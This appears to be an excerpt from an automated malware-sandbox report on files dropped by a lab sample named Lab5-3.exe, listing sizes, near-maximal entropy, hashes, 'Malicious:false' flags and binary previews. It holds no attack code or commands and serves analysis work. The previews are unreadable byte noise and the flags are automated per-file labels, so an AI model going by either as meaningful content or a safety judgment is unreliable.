                                                                                                          SHA-256:E6E6EFEACCFD84F04D970F93EA86AE43FB49DC496CB65E05E3426CEC6194F8A9
                                                                                                          SHA-512:53F9C54DA448051C983DF7560E9F90711C08521F9FDF1BF856251153397EE62FB58F56A542251BB6C398AA267040D6BB76C615BE90CFCEEDF10458C95C1E3D5B
                                                                                                          Malicious:false
                                                                                                          Preview:$......]..NZ..s4....Q..w.#..c...._U...#.h-+e%....R...>.m.1.cE.Q.........fSL!.b...Y....L....k....!Y.$..D....d(&S.p...0...'......:.>..$Ab....yk.t.[.. .h....j].....x..n..KfLZw&U..U.S..H^...)H..@.>.:..G.....Z&!.....Kbd./~..T5..v.y.l.@V.E'P|..9../..V....)....%.~F.}.f.Ra~}...<..\.Z/.._v......9]....O+..w...e5....=.."..Q.6snmG....n.I..E.Q!j.,.s.QH4..~.Z..0.y3..l.I.6..|$.sZ8.YY'.....%..0..Ps..Z<C....I.....E>....[.g..`M.U.p=.z....`..y.;U..M.......g+....q..s.j..I..C..N.?..C=c.b..7k..Z.m..w@..|G<|c...&#..s....t..@..S../..Q'.y.....t.i.....c.\....jJ.@.E..Y:_.=J3....Bk:...,.=...FW.\..l.s.4...tk.n......#b.h.Y^.i.....V.5..k....P.D...=..rAa}.....c..Y]....,....:..d..D...L..Q..^P.....e....t.xL3.L../(&%Y.e.lx.W<..Q.'v...ZaX.........J.1._7.I......;G.......,.R.L.y....g.......H{.ef~..N.Xg.:q...$*,\..!.1...j....6...|y...A.3....T....hp...PaM.......1.'....@........X..~2..R.1...x.*.5 o.4e.}.......T...Wv.K:.|...KJz..... . 1Z..Q:.....|r...y0...f..,~&..`-.q.B.,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.974662276404384
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:JwckP3uFIpOLJbszZHxvDUuP2xpx1V/6crvMVbbHNgXxkIEA6uObmfe1AGx0uKeR:+hiI8VwVx7UU2xn1AV3NpvaOiGz0Cb
                                                                                                          MD5:038E7F39751CBB7851E3AD55DB304E8A
                                                                                                          SHA1:AB67A4E24FE63AD14BFD3372AA73ABCCB567172E
                                                                                                          SHA-256:E780BE79B1568EDCC2EEF3A5C6E8FCC26766C96B44C81F898945BBF0AE2FFF3F
                                                                                                          SHA-512:18742546C2BA641FB3CB2434F94BC10E93B0AE76FCCB0D82F02DE36362679C1F2671BF533BE4782065DCF4E2ECF7B87D5D5ABF1FB141CEDCD8B395FC641BD5A2
                                                                                                          Malicious:false
                                                                                                          Preview:..BRR"....y)n..1..e&k&....#..........X...c.....=1lL...LQ.....`.".Bz..?...`rgi.!.u...;cd. .v... GI....>...f...H.$RO.v.>.g.....`~P..4_k]-.L1..tu;..#.%..Q.w&..b._Zt...r.....$..sJ.I..B...efF8..2..........F%.a.....R........*I.....yt....6g...e=8O.g.5.b..."\JX..JF..Q(..k....h..'...... .bE_@..UYM.........8...~.h...<..j.....t.....[%..."8.I...6_...z..e`s...t~....t.m...vI.).@...... .T)....ZZ..3.{.$.....p.....g....o#].CX..n.v|..,1..pD....o....\..w.,...z/......z...H[q[..U.n.H.Wp... ..a ....7...%V1....#TO.x:{:-.h..\}0(..M....d.L<..5.5.....v....s..HU#..YD.=6U.k/=s$...6T8l6.%.p.b..<r.S...F..iE.0?.....(t..u.x.y.......qw..ZH3.R..>g.......a2...8...a].....T.Ra.e.:..!b..ph.n_.0..J....B=.....5d.H,.y.I........M.".L.?OG..Gi.............It..~..e}+o..e3.eM..{.(2.m..+!kA.c4...U........-q.nG_.}...k.%....9...Aq...K........j/... @9.......~...)AE<<.5.(..[x.... &./P2.$aW.#._H..z....L.i..[m.CT.NP..{..U..8.rq;..{...",.z.5.L..5#.*T..e....>.?B.....'.=...6<`4V.....e..$?f...!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8400
                                                                                                          Entropy (8bit):7.97882118752753
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:PcluiqE89uRVPJZzvcU9zbbCBYbBWTuIEvrxune8wsYtZH0v8NV0Cb:PGu680/zTPbCWWKfvrxutfY4veVtb
                                                                                                          MD5:02E266A3BEB1A5AF546376B2ABB790F2
                                                                                                          SHA1:2444FC36FFBF5F1285363668AA1C0331F7BF5768
                                                                                                          SHA-256:29BCFB74214DEE98BF543287D243212C3FCF44B3B9EC212D98518B237367ECD5
                                                                                                          SHA-512:6FDF261B502C4CEBCF71F2D8C5AC9A070E558E7395B561379C930C851298D3D63AA1396E4BC50B52C7ECACD15036C5C507F3292E9AD10E0707BA7F5470A9866F
                                                                                                          Malicious:false
                                                                                                          Preview:...F.^..8R.^...W'...gk.......b..o.T..bx..)`..*w?#...{|...*N.g.....KL..p.{.7...fh.......3....2W...aQ.i.!.'o`..R.~..9..RO..Gl....++.....o.1.QR..*l>Q.R##>..8.`...3.........%)...L.....*p..-.u.....J...RZ.gT.c.u...|....P[/6Emsr..E.=.W...........mG.....x..@...?....6.j..&h.$.R.f...XDW.t.n.`U^....Y{.....^..ZE.TyXc..V.u.k.>..&.B.O..AC)P5q<.`.....n..?.....p..'s...F.. .f..SB...?n.._z.p......K..s......U.C.:*.UA/~v8..OL...@...N:...|z......u..j....K).O..F-5..o...Y...G.L..SG..9.8.x...Z@..".B......|.d.~.....8d....,..+.H.T52 .......0D/.@>.A..j..F{)..1(w!.oQJ.# (..C.W<.00......J.8.G.R....IK.R....z3C.Hz1.P..r..>.w....@...e.V.TI...t....Ma.....g<....6...qf...l..H.At..OA ..>._....3?"8N#..I-fP..8..p..L,..2.b!0../...}..f9...B.0.b..UF.'...9DU.^>1.0~Yu.q...k.....PS.N.2B.`j..pBJ.....~.E...S...kN..0BS.K..ai3.1.E........n......X6.u..c.5.du........D.<....mN.+.9.....>s.a.e...bVJ.Y.......$..*4.)...O*....(."[.g.....P...G\*.>q.(.E..w.4.A*n.z .v.....R......%.+0G GV&10a..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7888
                                                                                                          Entropy (8bit):7.9793468943090184
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:LNGUhcaNjbwwY0AVbDfevD6j6rcSuuO8f1tq0Cb:LNBuaNjbwtnZKvD6Grcs/Lqtb
                                                                                                          MD5:38060380B29F1A7B14519A331B65E510
                                                                                                          SHA1:76CAF49D94341BB8F7FFD36CF3EB503708C199AA
                                                                                                          SHA-256:E7072D88847F5CE7E9365E9DE5DD9EFCD2EEE313A575151EDC98692130605335
                                                                                                          SHA-512:931A58621A1FE9A552906E5EBA368BB8EC65AC9E0DB8CE97328C93A4A07D9157BF68414AC95F9A8DB027E62F593ABDEA582F84C4C48E5EAD5878050E39058C17
                                                                                                          Malicious:false
                                                                                                          Preview:.eZ....}l..3..xY..a.......e^b.h.......a.......8}...O..1.9f2Ce>!<q|.y......Y....1C)C.....$..f.....y...#..E.z.....Ob.Z...^..,.&n....-..wg.Y...#......ZH...aVy..)..6...o....7...%.&.;Z`.W.#+P].8...(.....(h......\.UT...PQ,......./S.T....a...9........#..=....L.S(.......*..-VR..uV=.Y]A...t...G...C{.Y...U..m..*y..(/....:|...K.9<l.r.:..DP7w.d..).,....\.'.M....P..n.....<..n....=...Q0.....4\#..S>.Nip...T4...>!.canK.+^...mL..l.....p..P&.RWyd*....*W...(.]........]..+(.?+....&.)..Koc4^%.W...'................?%4...9)K+.Kf......1.....!9n.;..2.$...H....#vK=..^...k..O_.D'^$lp.6W....,%l.yk..-....y...nU.#...8vIe...H~...gM..0..+....~R....i.H......:.?.ei&.pu.2....9.~+.j.;./..p...yu...}...$Y4l.)Xk6.v}....:z...h`0]......t.....<....'.........4.......c[/.....)VS..b...P..,.a.....H>..g][.Q~s..*ca;p."..NU|}[.&:....H...y..D;....H..di$...W.8B.i..m...X:#.P..0i._g.:.@eEA...4......h!..../...9....S.OM.W.pBh......?.|.`.i..D.....>......+....7.j...I..x"....n....g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.972590311277222
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:KRT53J53RUH/Hf0QWdxzRp4JXaq3UEEKhRw0Cb:WT5jyH/iL4VaHhKhqtb
                                                                                                          MD5:8FB77CDE7BCDB7CEC84A5C817C8B9D96
                                                                                                          SHA1:9E6D3F3C27575C257CA23E3DAED755F920ACDA97
                                                                                                          SHA-256:4EAD7F5D83000D9E186AE8D13729991C736B6DACE85A7EBD025B39C9D01D4D4D
                                                                                                          SHA-512:2256F24BD8D8D11E9021832C837F3D59B838F3FE8D8C82D26A415C5204D20B92148D63E2CD9C187931F64D14F58C64CEA58E2CC47184BD8A415E9EC1EA2AA06C
                                                                                                          Malicious:false
                                                                                                          Preview:sdb.7.R..*...&.z...3....B.@<....f...0..ed.#.P.....f...D...l..".|...pt".x.O/k.....E.~C*.....Z.Vf.!..`..i....lN?.u..../......z..w.,.......H.2V...3..-.<S....';..i..-.g...M..D<.2..].K..4}.....m.....;...$f..F....LNfP.........e.......U8..-\q(.v.ztc+.a.]..b$.`..s...uRzj.$G....$.e...GC....,....F..3..tnN..y.H.5.M...Ny......M...*.M......&<.e..`=.IS....4.9U.{.....1f..!.D..n.po.u...N...F0.O5..r}.?X.%....Jz......SiO2.9.T..g.i......m...Q...v+Q.<...U....R...&^.(..mu.R...Qk...L..Y.bC2..7...s^.{.+..u....'.R..^.5X ....X.c..P.......g.R._..D.j./.=iR}...u..7.~|zRO..=...o.'.........{.1...P.>.C>E..VY_..|..%.ai.r?..+.B.H...=...9P.f.G7...G....$....5..y..7...._.Y#.._.$z..$|.-2..^..P........t!....^}...<.kJ[.y..Kb2H....5La......f.C.\.W.3k..'~...uC3..K..>....D[N.+...2.......n-..ab...,Q.>F.....`..O.`Q3C.eT.m.1MK...y..LE.,.P[F7*9A...Y..&.(..7.....hO.)..2;.J.wf...m}........F....M.{p...a'.Sm..eJ.L...V..A.Z._[......?2@..Bw..Xo...H.g.*.t.@G...f.w..oM.....D.~&...z@....#.,../..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7920
                                                                                                          Entropy (8bit):7.973797211906276
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HsyxdDltODw62CbfU5Du3DLZBBctg7r4Jpq3kLSAZ0664qCGx0uKeY2ElUJ:5xdhgUI8G6tgIbZ06pu0Cb
                                                                                                          MD5:FD17902B404DE1042BCFC320EA2A88BC
                                                                                                          SHA1:FC883C8C3C17E52A7FAF5471BB48ED44D1893585
                                                                                                          SHA-256:AF6DA28D6D75D727A1FB53F0CE301E10743E6C352DBD54715A4719C921D3D4E2
                                                                                                          SHA-512:15C9829764CF77FA0198AC03808B23DFBBE735877CB27666ACD4EFB19382024CEF09A04F36784C66B794EEC903D6ED6EE0450287E0E23D388FCF87683308A87D
                                                                                                          Malicious:false
                                                                                                          Preview:..qVu8`{\...mj.M X.........-v\..(.~.D.]xQ...._<.u..n...,..6....A/..Y.0.Z.2..lJB..R..9.b....9...@6.W....H.L...{.....!..5.\[..V..5'G|..C ..Q..rw.Ff.(iG.h.....{W..K..[..;.e....hQ.4..{.P..P3I..f...yr....^..!t1..D...jN?.c..,.."..X....w.A)h|? ..e.6.8.z.wD1.I*.w.. D.]V.....~....HV.....Rc........e.0.....7..r%{..K.e{....e.....3e........Q../..R.vZUn.M...-tR."3"..~.WM..,)........$!j..k...$...@H....\.......T>P.9...d7Al.F...L...K..*P..\'...@..z1o.<.{..=..,Ro...nK2...=.m@......e.s...V..%...=....6..}...P|...(Jj7K.U.F......~.d...4t....v..MB.{.lP.TT+;s...O?.U.c.+..P.......82\.].z..Pb..+9....}...:IpM......,.1...>n...x....}$...a..)o.....#.6@........w.....X(y......p5....r9**.J....{:gl.s_.......I...}f.aE.-..e.[m..b..q.*H..`.....f.G^.`.Z.[ZE.._.....rIh.g.@{..Q%.<.C...=...J].>.. ..$../.5.........!.+.H-.{.J1.R...PGQS..>+'O...o.R..l`...IY(.....u.h.B...C.*Br... ^IF.U6.E.A>...Q../I.1.,C.e.F.,..2...9...j'J.dV.i..._8..s.^..,..f.5....J2..)._.C.M..)....@q.....'[!6.j3....+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9376
                                                                                                          Entropy (8bit):7.978047964778477
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:HU2Vq+JQmK0dCKz+Ehd4o34Gh+E1qNQ3pR90vGa5xN8Ek80Cb:02csW3KBdl4Gb1qNQ5Qea5xOktb
                                                                                                          MD5:B40D011B22166AA8A600F48A6610E2EA
                                                                                                          SHA1:5D4FD001E2FC02D25DEA63FDAB8A06E76EFB216D
                                                                                                          SHA-256:0796217B56F6A55646AF40CA2FF3C9ED4E140111459F708855DA27CAFD5C0077
                                                                                                          SHA-512:56C791F2FA5B60D34DE7B881BEC596E37E61C0357C6A7E4B2C15EAD6370E25AE22654874F596B456D0CEE6CFAFBDEB2183FB7ABA0362A794CB054A31677DE2CD
                                                                                                          Malicious:false
                                                                                                          Preview:......` ?...o.0.P|..DG1N3X.Z.....[S...E{......a.-K....?b..tK.{..,..L.5.2.|v&3..5mP..`.-.{.`..:)...V....(.C.w.....q....:.}y.R..Ha*.X.c.=...08..(%.b....8.^m7.k.Q/....n...?..bx.6P?."..L.d0..;yt/|.....W.jeVIq....I...<U...(.>..w..Zw.......F>*...c86...e....:.o...]R..P.c..dr.:.c.3F..P.A+./U....~~.......J~<!.O....cu."aJj.cby.Ba...8J..u....Rwa.......=.zy(.. .G'..T.....wy:.n....O ......,.4...x.........|.....C:..}...o.#4.o...o.V..x.h.<..T...O..G...%.to/s.r=..=_.Q...4....?*.N..^/..J.N..o.L eR..$oj...bw.7..z1..&5.YF.......iX..2*..,E..NM..............7.bF.*]e.X.;.s..s.....YW/..B..d.....D.#.}..r<dQ....-..:.~!.<...O.....O.TL....'.3.=q#..KQ'G=(.k...a..&..V...w....H...8.F"....-.@5!..&.>.*.`'R......P.N..n'.u.....S{....L.....r..<{.B\.O..Iq?e.&-......M<..9.+..F..z.$[3,..T..V...V....@0.......m..h.).c.].T/K%w.B.u?..j.+...RJ&....%.j`.96.,...#K.J%m.......t.%K...........o.&l.D..\..^...;.K$R.i..u^dUw6.rz.;..J...-v..\...~G.uD9./L{..2..d.s.g^.?.....8.`<.......c..N.....R..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8368
                                                                                                          Entropy (8bit):7.974301906552446
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:qpaXgs73INvhS4lAmXMa5dggDrnPbjAG0Cb:qIXCvg4l9ddfgGtb
                                                                                                          MD5:15F09E28AD13854E218698C94EAFAE6A
                                                                                                          SHA1:945C0E8D11488EEF87A1AF423C1BFFC659B6180B
                                                                                                          SHA-256:15A6C79499E1EF622C6A803211FD2749A4B7D8BF1B8596F2B31ED781C7783FC9
                                                                                                          SHA-512:0E148C5256FE8753A40EDEE16726CB97FA042C2B1E724FF66A1C79AD179A791F22A567458DA8EADB97E275F86C35C4B83A6A7443E42BFE3276FBA42C1D00FC91
                                                                                                          Malicious:false
                                                                                                          Preview:...A .L.&G.`h._.cn..;..e..*..Z..w.O.e/....a.R..4......w,R~.....Z..U?v.U..0A..?......!D...Jj..|D....}.{...5....<S.!.....M....^.3...d{}..p.....i...$.J...........*N0@...Z..lH&.f.Z5..eC.l..@zL)e.T?`...~<....-* -.@..kJ*.....jD5...U'f.r......Xi.]L1......Ha..h.."q....Y8.k/.M.r...j^...Q..R...P.0I.{..J..l..4...x@.)0..M..q..;Rd*.l./..52At................].eQ.n. .v4....W.Sh.mt.'&....-.C.m......3...........Tl.4.........7. ...G.e..f..2...`...M.=.3.m.!......?...Bezo..1..XR-..G[.0M.@.[../...i.*.._..x..//.U..v.i...-.Oua.{.Fc0ln....(l.....Z...LxG.|.u.>....~..0.uJ=.[.../.h....I..!W.....!..... .zo...V8...g>.%DE.j.j..t....%q.<....Qk.nV......^W....Y.xBw...9BN.,..WP.K.....*t`x.S]?|.8.EMVg.....r....N..c3.k....~.=_.....z.sR.(..B>~....$S.*N]...........l:..6....:..<J..^.I...~.&vS....1%.h.U.:#n..>S.P.).o.,.z.-m...v.@......'j.!..X.p.i..\.."R.*.>.m.V..5..4!.......aw......u..d.I....I....f..F.<.B............&h......q.._v....Iq.@..>.2.BL!..$...T..M..9.R.....l.g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7280
                                                                                                          Entropy (8bit):7.977626402115108
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:YT29xflB7+oEaS/49LNH7LO0GS17KykaDWpZlobD0/cGtUvQOe8ly98nIaftn9X5:YT29xrsgpK0GGTLYPuhGDuY+3XH0Cb
                                                                                                          MD5:1B63D3E95052099AD807381F91D89283
                                                                                                          SHA1:65D71FEB2117BECA25A3D2ACACE674BF994F122E
                                                                                                          SHA-256:915F2988DF30663D6DBC2776BF1DB8F7D74896CA303F9225755F5CA1772BABD4
                                                                                                          SHA-512:31D7ADC1A1DF107B26F6F884A6E2A04EE2512795C6C70F3288E993BFCD1A75BC7B8AB2F501A3377377505A53D5649FDC2596C2DDF8F773158467C0D1D3A5C7DA
                                                                                                          Malicious:false
                                                                                                          Preview:...g....&....}...:.J.!.....B:...8fy.z...D...?.0Z.Y}3.*.^..9....F....*..^j.......g.f7C.o.......\2...5....z-.,M..g..H..6..L..{....*.....O....u8...Ws.v{.&...`g..Y...#..8-.P.4)...Bi......7..7...X.....>.....P.a.&..9..c0..H.p.<(.k...f...E."Q.W.+.b...it.+=..s!M...-q[I...!..h.......".....(..S.t..w. ............zAQ.Bp.V9..[.P 9.;..4(.lbd.)/#..)o....l..P....].i......W.=.{.2.......t...!f.].x.F...[xd7rx..'.b.)0."...!*...S.j.i.sS!...&.>u.!6;}.K....aL.J.(8..(v.P.*.....-..D#o.\e.FK..;....XZ[.Ujc.O.g.x#..vSG.^..a".M.k..~+..n.......p.,.,[R.E. .l.:o..n..R.v..n.........M.q.u.A.'...............,..<..}u..{..{.T.c.Nz.u...X.#....]@.N.Z..M.|e..L.[6..H....I..w_.x.!.R..br.)uC..&.=-.:7.$..0....-P...........0.G......(3S.!3].....1_h..GAa....j........q....._X../.O(a.iE.W...$@........./9.4.].E.~6.G.,..........Z....C..Fi...@}.^.h.8..N...2 .K4..iFP/.....@T..IebU...<.b&.....u\ms....c0..h&..V.,.h..ce..#cA.:.,..I.....Q../..Xn.p..11...J..6......R..E.-..,VV.....E..'\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9184
                                                                                                          Entropy (8bit):7.980268887308259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:zUeusitkF5KaONK95EgWtqLEZHN5FAkUPnnN70Cb:zUDsitkF5KayK95hWALEdPFneltb
                                                                                                          MD5:2B63A53EFE5988611559706C02667EBF
                                                                                                          SHA1:265A3D2558A485F21000402F166B00F37B05B693
                                                                                                          SHA-256:6111A4FC664137B56989DE0F0115E0A1E639BED64E31DAF3C3F2C35DDEA082DC
                                                                                                          SHA-512:F5508061DB6EC1FE373F6180696E1C864A9413F1AA3D0CD4460B8E4B3271FFC8E08F0A90F9863F1EB9ED7E25D5E173481F9C6CC1BBCFE9C8066C6FDC43305611
                                                                                                          Malicious:false
                                                                                                          Preview:D&.@.?...L.p.yz....G..d2.-TKa......l2<..R..g|3.1'...6.-.9Y....0..V...D.F.U....x3C.o..^f.L.._..5YO7o....'...@..Y...|3N..x..w...gU..(?...V.I......8Nqh.BS4.)4"..Z.....x.T.p...g|.o...B$n@WL....=.C.'.N9...Er*..W........w)I......o<.....Ln.....F.&..B..[.p..I..?;_...........-..FX...Wz..Gi.......G.F.<./.b...B>.....c1..V/..E..k}H8..qasrN.5q.......>...._....z...`...]mR.L..t.;.v.z!$X.&.~..7...R#,..)...J.N.(L."..b6pF.s..U}M.P.>n.....|..H...u-....H.u'"...9....-...4....f..F4.....f...R.c..9..C..H..S'...#...8.~/..l^v.,..uJ.!...>mX......I3.aao..N......E.......M..y.l..."...*..'.s..7KG@Q}..%Y*,).~\..Rp.;..L.CD.f......{.D../.\...Z.$\..R....b.. .t.^%.....5El..g......^....t.@.....t......v1..|... .k...=..{w.h....wFy...x........+....x....s......~....`..*...Y.wVh*..Q..;S.5u..)....$<.t.xP.....U.x....j\.,f.L[.J.........I../....S.........w8.....iI.fQ..8.Q...(.@.m|.@V....\jE.nH.jJ..55..T......HVL..KE2z.M.b+._.....M.q..X.......9.N.B...S3@0-_......a.b.^`C...x.k]..^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7184
                                                                                                          Entropy (8bit):7.974665846000788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:7bWX6YihbQulSw4QyyGPQM9clqWxkcHSTgbl0Cb:ZYObtlSwHfMcIXcyUbltb
                                                                                                          MD5:FAF966772C414BCA42181E238FD5F1C1
                                                                                                          SHA1:0EE87E10B90400869F8425B9D6717959AC9EBBA9
                                                                                                          SHA-256:E21588848534093217EE366AA5ECC2A95A13F176FFC389680E17EE9344B92E42
                                                                                                          SHA-512:FC94FAC37C75A10E691204AFD5D5A3755D2379F33D4F380BED051DA40C51613594F5C8DE6382FDCB5CB3A13EE623A31923B14B31915DAFCC7822FE98D155350E
                                                                                                          Malicious:false
                                                                                                          Preview:b...A..3.\..!.@.vxy..t.G...a ?....7.....<&......ne.?'..x$.........h.Sk........&...g..P..w....1&....v...bn........`.H4.6....y.d...=w+.wch..jJ.'..Q..B..3..bw.B..9w..@.Z2ph..1..z.f..p......[L..%eb.......[...Pa.l.U`..H.....yE..g..jS.nmz..xX...-.j..ce.+......l. ..R.r...........JoE..%..D.".$.-.b.|.b...,]....U3....w......@R.....I.Y1(.l.g....F..: ~5q....3....Nv-@...2=..M....P......LJ.I...m..N.UZ&......z....hLh.r2...w.0. Hg3....O.~.,.Kr....F....x..S....."./...T.......+.........1...4..g..n.R(.0E..M.K.rf...|."cW>.#..]t..p7.m....r..~..v.T.w.9....l...,....3R......q..}1IwZd.U...Z ..G......fp[c.P..8.t.o........vZ..o..U...F..'pr.z..R...._.]!.Ew0........5F.0F*...>...x}.i`..(Aa>..@|.qb.R....u.x.E.q..<....}mg.~..1......8..cSV........f....f....+_.CP...U.p.dI...X.)..{..86.B`F...Bw8.Yp..3.....^<3.NY....$14..-...V.?.UZ..;..?..(..4 ...AZ.~.....J.....r..^OfD....o6.`3.]....,a.N...?:.J..?..c.+X...5...&Y2<`.g,.L.Wn..o...3.RW.Y.....PQ.h&..T..=Du"E..j9xy.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8960
                                                                                                          Entropy (8bit):7.979550607913992
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:nyBoGU+9j7NijuaFoYPySsMaRtT8NSXwRunxseHsl0Cb:nyB7UzuaF3Vs99dXPnWeMltb
                                                                                                          MD5:4B5FC2309973840DC5CBAF2733E133E9
                                                                                                          SHA1:83E15AF1BD92F223A99CA3BE2C250959187F83F4
                                                                                                          SHA-256:6362B8A1B3F6578739DA7B9C6C54FBD5D4F8DCFE3B7A93FCE7B66D16C13189C6
                                                                                                          SHA-512:F85265487A08F345D91BA48080CB58579E5C24855C47472BBC3E3AA693A6D635A93759D0785ABA88E61E3CE86CC4BBC20F5B538179B1C52AD77420A3B79EDC40
                                                                                                          Malicious:false
                                                                                                          Preview:.(.c.+.3.ho..w....._.?.s...q..'.O..C.6...E.......*.,..... z.E.[....s.2..f30(..UY..........g[.kg..r.\.....~.. ...B$......)..t...u8../..%(15...u....f.d_.k..S,/.:.......$..1..E9C.U....?..;-hP...Xj)0.._.6.m$7..S..J2M.'8&<.i ."..Nr)..<e..._....*c9...n6A.....~.Q.Y._n.{.S..:KgN....6.t" ..e.5..*..8A.K.6...R..[.C...@5...D=.........,....s..S9.7.....2X.G.b...\Z.........i.8...y..1Q.....o..Z=.hlg-}../A5Y..Q...........n.d0{.....+8M....%N...n.,o...8...:a......:....{..}..ahD..;x.$.....aAO....e...."..AS.A.E[.Yi..]lL.R.u+.&o..}..54/-..D...!...<7.I..X.*....aYM........:....^V..C}.>D....e.......F.Du......2..<&.8..<F....../OG..n.....U.Wy................l....tN?..FR.@v.......2.d.w......i.n.[d......M..&.....l..@....M.pT...H\@a.(../..g.|..O....4G,...s..wW..J.F.I.<Pw..^...2=8/..i.....Y...v=..~........x...S.*p.. .Okp.1.&.4#I..pg{.(..|k..f.>7.C....h*.Y.\........I...C..=3I.v....l.F..H...4..K.%aV.f=...D...Lz.&.s,W.f$%..Qvi|.[...cj24.....G6.Jh..V.4^..~.7I....+...x.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7312
                                                                                                          Entropy (8bit):7.979528232063866
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:plfmuwrKFfnh8VyhgHuZRwf1SX8lehEyw0Cb:nmulh8VwgsRslgZwtb
                                                                                                          MD5:AB5AAC5A3C938BFCC055FD7DDAEE357E
                                                                                                          SHA1:C425151B197C1022751AD45436A4007C02AF38F9
                                                                                                          SHA-256:F0E18EB6F6E3FA7517E6009E49C8E529EA2A038C404B476ADE0E5C1479A5A7E6
                                                                                                          SHA-512:DF58116F791592842889C265329EA1C8A28DDA36B4D4C7FFFBFEF70337E5B3D1D944BA4F71028C27A6E62734067CBE44F9712F5BC44A8728E2B2D255962A6B4A
                                                                                                          Malicious:false
                                                                                                          Preview:..p.)'....o.Y2...#[+uzP.6...Z<xG!Q..:..X.......+ 1.g.Mn5.|..g.I...g.B.P...!...$9...F2.G.V.&z.u....j.D..Ab...d..7M5Aj..pPuk.!&.M.+...^y].>.....Mo6.U..ZN..;.5zE..e.l.N....<..-..G..d......._?qgx..H{]..2....r.Yn.)<.......t..P..........C.h.....t.*.4.o-.......>>.....i..X\.Q..@...Q.....'1m.~z).r..J.T...C.c.B....b.f.%8..y=R......`R.h.]...e.6.Oa>F]..,...N...~vE......X.m.r.i.*.......U.....C5....R.....k...J4v7..1U......=Z..am..m....g..#_MtJ.....j.em+..B#A.Xq..I...x."..Kcv.....Cw..I..@..E.^....M....U.6.^....Kl........c,t....O9.!...]v.....v....6#...%F@....(..8....I..e....>....f..Jx..E.u...bp....Q..M.P.....u.:...;+...x.H....K.~n.|..vg..~...h.IK......z......m..9.P...S..Z.jRYO.u...}Ci,.c^T4...2f.=.w..[......?..U}........@.z.p`H..B.R...n...=...tT..:......o....4.....`.=.N..-.^....y>..z.....d~}...jGF..P.8k%...G.d..........8.W..$.@.A.W.{.W...f..ive!...z..z<~..G.^<'Llq....y.n.0B.....o..1l....S>.....VW........o.3...Bu}TS....A...k..5.-.. .e.U...d......W...=s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7776
                                                                                                          Entropy (8bit):7.976161577193398
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:hMya1tODI66DgKZGOYmIp61kLMNbw1U2PjdeWqGplT+0Cb:Ct1Kl6DYmc6qLm6B77plCtb
                                                                                                          MD5:A123CEEB076285A3B64EAA44CED73D10
                                                                                                          SHA1:08A5C2A93F78F879BF5EA4D8E97FDB04D71BE8A2
                                                                                                          SHA-256:111F7B90CF227AE73B4D2292402A93FFEED785F5073D6F3BD8A5A87792F0D118
                                                                                                          SHA-512:632A85751330F88DE974BDEE0FAFC572774A786A499B06C888E67640F452BF257E9CAD8E1B351B1C2C038612C27247E4E5E2EC8875BA9A8B271683E39E7F6B47
                                                                                                          Malicious:false
